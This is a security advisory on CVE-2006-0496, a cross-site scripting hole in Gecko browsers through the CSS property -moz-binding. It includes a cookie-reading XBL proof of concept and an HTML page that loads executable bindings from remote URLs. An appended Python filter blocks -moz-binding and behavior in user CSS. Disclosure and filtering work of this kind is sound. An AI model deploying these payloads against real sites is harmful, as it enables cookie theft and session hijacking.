Gecko Based Browsers -moz-binding XSS
Summary
"XBL is a markup language for describing bindings that can be attached to elements in other documents." "The value of the -moz-binding property is a set of URLs that identify specific bindings. An individual URL in the set consists of the binding document's URL and the binding's document-unique identifier."
Credit:
The information has been provided by Juha-Matti Laurio.
The bug report can be found at: https://bugzilla.mozilla.org/show_bug.cgi?id=324253
A blog about the vulnerability can be found at: http://community.livejournal.com/lj_dev/708069.html
Details
Vulnerable Systems:
* Mozilla Firefox 1.5 and prior
* Mozilla Firefox 1.0 and above
* Netscape version 8.1 and prior
* Mozilla Suite version 1.7.12 and prior
* Mozilla Seamonkey 1.0
Gecko based browsers use the CSS property -moz-binding to bind XBL code from additional locations, including remote hosts.
An attacker can use the -moz-binding property to inject JavaScript and perform a cross-site scripting attack from a remote location.
Proof of Concept:
Cookie reading:
<!--
  this must be served with Content-type: text/xml or similar
-->
<bindings xmlns="http://www.mozilla.org/xbl">
  <binding id="exploit">
    <implementation>
      <constructor>
        //<![CDATA[
        function exploitMe( element ) {
          element.innerHTML = 'Attempting to read cookie data...';
          var data;
          try {
            data = document.cookie || 'No cookie data.';
          } catch( e ) {
            data = 'Unable to read cookie.';
          }
          element.innerHTML = data;
          element.style.color = 'green';
        }
        exploitMe( this );
        //]]>
      </constructor>
    </implementation>
  </binding>
</bindings>
Remote loading of script file:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <title>Cookie Exploit</title>
  </head>
  <body>
    <h1>Cookie Exploit using CSS</h1>
    <p style="color: red; -moz-binding: url(https://bugzilla.mozilla.org/attachment.cgi?id=209238#exploit); behavior: url(https://bugzilla.mozilla.org/attachment.cgi?id=209240);">
      This is a paragraph with inline exploit CSS.
      The CSS executes JavaScript that can read cookies.
    </p>
  </body>
</html>
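As an added defensive example, not part of the advisory: sites that accept user-supplied CSS (the LiveJournal case above) need to reject the two properties the proof of concept relies on, -moz-binding and behavior. Because CSS identifiers may be written with hex escapes, comments and mixed case, the check first canonicalises the stylesheet the way a parser would read it; the sample input is constructed and the host name is a placeholder.

```python
import re

# CSS properties that pull executable code into the page in the affected
# engines: -moz-binding (Gecko XBL, the bug in this advisory) and behavior
# (the Internet Explorer HTC counterpart the PoC page also sets).
ACTIVE_PROPERTIES = ("-moz-binding", "behavior")

_COMMENT = re.compile(r"/\*.*?\*/", re.S)
# CSS escape: backslash + 1..6 hex digits + optional single whitespace,
# or backslash + any other character ("-m\6f z-binding" is "-moz-binding").
_ESCAPE = re.compile(r"\\([0-9a-fA-F]{1,6})[ \t\r\n\f]?|\\(.)", re.S)


def _unescape(match):
    hexdigits, literal = match.groups()
    if hexdigits is None:
        return literal
    codepoint = int(hexdigits, 16)
    # Out-of-range escapes decode to U+FFFD, as the CSS syntax rules require.
    return chr(codepoint) if 0 < codepoint <= 0x10FFFF else "\ufffd"


def normalize_css(css):
    """Canonicalise CSS before matching: drop comments, decode escapes,
    lowercase and collapse whitespace, so alternative spellings of a
    property name compare equal to the plain one. Comments are removed
    outright, which over-matches rather than under-matches."""
    text = _COMMENT.sub("", css)
    text = _ESCAPE.sub(_unescape, text)
    return re.sub(r"\s+", " ", text.lower())


def find_active_properties(css):
    """Return (property, value) pairs for every declaration in `css` that
    uses one of ACTIVE_PROPERTIES; an empty list means nothing to reject."""
    findings = []
    # Declarations are separated by ';' and by rule braces.
    for decl in re.split(r"[;{}]", normalize_css(css)):
        if ":" not in decl:
            continue
        prop, value = decl.split(":", 1)
        if prop.strip() in ACTIVE_PROPERTIES:
            findings.append((prop.strip(), value.strip()))
    return findings


if __name__ == "__main__":
    # Constructed sample: the PoC's inline style, with an escaped property name.
    sample = "color: red; -m\\6f z-binding: url(https://example.invalid/x.xml#exploit)"
    print(find_active_properties(sample))
```

A non-empty result should cause the submitted stylesheet to be rejected rather than stripped, since partial rewriting of CSS is error-prone.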
CVE Information:
CVE-2006-0496
Disclosure Timeline:
1-Feb-2006 - Vulnerability researched and confirmed
2-Feb-2006 - Detailed research
2-Feb-2006 - Vendor contacted
2-Feb-2006 - Security companies and several CERT units contacted